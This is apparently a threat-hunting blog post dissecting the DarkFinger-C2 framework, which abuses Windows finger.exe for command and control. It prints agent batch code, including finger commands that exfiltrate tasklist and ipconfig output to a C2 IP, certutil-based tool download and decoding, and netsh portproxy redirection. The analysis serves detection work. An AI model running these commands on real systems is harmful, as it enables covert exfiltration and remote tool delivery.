Understanding & Detecting C2 Frameworks — DarkFinger-C2

DarkFinger-C2

FINGER.EXE

from the windows command line we get the following description :

“finger.exe”
finger root@172.22.207.194
“finger.exe” result
#[Server Portion]
import socket
s = socket.socket()
s.bind(("192.168.242.131", 79))
s.listen(5)
conn, addr = s.accept()
data = conn.recv(4096).decode()
print(data)

#[Client Side]
finger random_data@192.168.242.131
Example code

DarkFinger-C2.py

The server side of DarkFinger doesn’t provide a graphical / web interface but instead a command line interface.

“DarkFinger-C2.py” Help
“DarkFinger-C2.py” Source
if __name__ == "__main__":
parser = argparse.ArgumentParser()
main(parse_args())

main(args)

main

create_base64_files()

“create_base64_files”
PsExec.exe
Ncat.exe
downloads_dir = "Darkfinger_Downloads"
path=os.getcwd()
if not os.path.exists(path+"\\"+downloads_dir):
os.makedirs(downloads_dir)
certutil.exe -encode "path\\x" "path\\downloads_dir\\x[:2].lower().txt"
  • downloads_dir = “Darkfinger_Downloads”
  • x = Name of the tool from the config file
certutil.exe -encode "[DarkFinger-C2 Path]\\PsExec.exe" "[DarkFinger-C2 Path]\\Darkfinger_Downloads\\ps.txt"
-----BEGIN CERTIFICATE-----
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA7paLxf8TMon/EzKJ/xMyi
y1g9onXEzKLLWD+i78TMostYPqJmxMyiLazIo2zEzKItrM+jbMTMoi2syaNYxMyi
drxfonDEzKJ/xM2ip8TMotqtyaN9xMyi2q3Io3jEzKLarTOifsTMon/EW6J+xMyi
2q3Oo37EzKJSaWNof8TMogAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQUA
.......
.......
.......
/fy7QawdfM0iwuYSrNGykJIfFwESDbhJlpfBENmhOHX4eurV4nCSghnI4+t58/DN
t2ew7XM1xXCEsU797aU7ZGiuW2gOWtZP005G3eMhA8zcrCTDbcRNCxbxrAvBiMCu
2GaQCw7/3QoEz64fjG0TMpIdOZ5EcsdnvAEWtkGPvBmPhex7iBuAbRzeC3xxF3MR
dxRaConyGOo9zVQdINyl40XeuojtUY4frdTKoRBiN4vzNySpvH65uDrcUbWCQRng
C+TsH2nwowysuRYThcCOXYjXlgAAAAAA
-----END CERTIFICATE-----
“remove_cert_info”

fileppe_fingaz()

  • If the data sent by the agent start with a “.” this indicates that the agent wants to exfiltrate data from the infected machine.
  • If the data start with with “ps” or “nc” this indicates the agent wants to downloads “PsExec” or “Netcat” respectively. (Note that by default these are the only tools supported).
finga_that_box
Global variables

DarkFinger-C2-Agent.bat

Agent Source
CD \Users\%username%\Desktop
net session >nul 2>&1
IF %errorLevel% == 0 (
ECHO [+] Got Admin privileges!.
SET /a Admin = 0
GOTO Init
) ELSE (
ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!.
SET /a Admin = 1
SET DARK_PORT=79
GOTO CheckOutbound79
)
cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}"
  • DARK_PORT = 79
for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%bSET LOCAL_IP=%LOCAL_IP: =%
Process creation event “cmd.exe”
Process creation event for “ipconfig” & “find”
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F  >nul 2>&1
cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
  • LOCAL_FINGER_PORT = 79
  • DARK_PORT = The port that the C2 is listening on
  • DARK_IP = C2 IP
  • LOCAL_FINGER_PORT = 79
  • DARK_PORT = 443
  • DARK_IP = 10.10.10.200
# Anything coming from the C2
10.10.10.10:443 ------[Proxy]------> 10.10.10.10:79
# Anything sent from the client to the C2
10.10.10.10:79 ------[Proxy]------> 10.10.10.200:443
Command Options

PsExec64 / Nc64

As we’ve established from the server side. The agent can request to download tools provided by the C2. By default these are PsExec and Netcat. To do this the finger command is used as follow :

#Download PsExec
finger ps%DELAY%@%IP2USE% > tmp.txt
#Download Netcat
finger nc%DELAY%@%IP2USE% > tmp.txt
# %Tool% can be either "PS" or "NC"
cmd /c more +2 tmp.txt > %Tool%.txt
# %CD% == Current Directory
cmd /c del %CD%\tmp.txt
certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nulcmd /c del %CD%\%Tool%.txt

ExfilTasklist / ExfilIPConfig

The agent by default only allows the exfiltration of the results of the following commands

  • ipconfig
cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP%
“finger” Exfiltration
cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do  finger ".%%a"@%USE_IP%

RemNetShPortProxy / DelProxyNClose

We can remove any previously configured “NetshPortPorxy”

REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1

ChgC2ServerPort

The agent can send a command to the C2 indicating it want to change the port its using. This achieved by surrounding the finger command with two exclamation mark “!”

finger !%TMP_PORT%!@%LOCAL_IP%

ShowPortProxy

Display the current configuration of the “NetshPortPorxy”

netsh interface portproxy show all

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store

Nasreddine Bencherchali

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.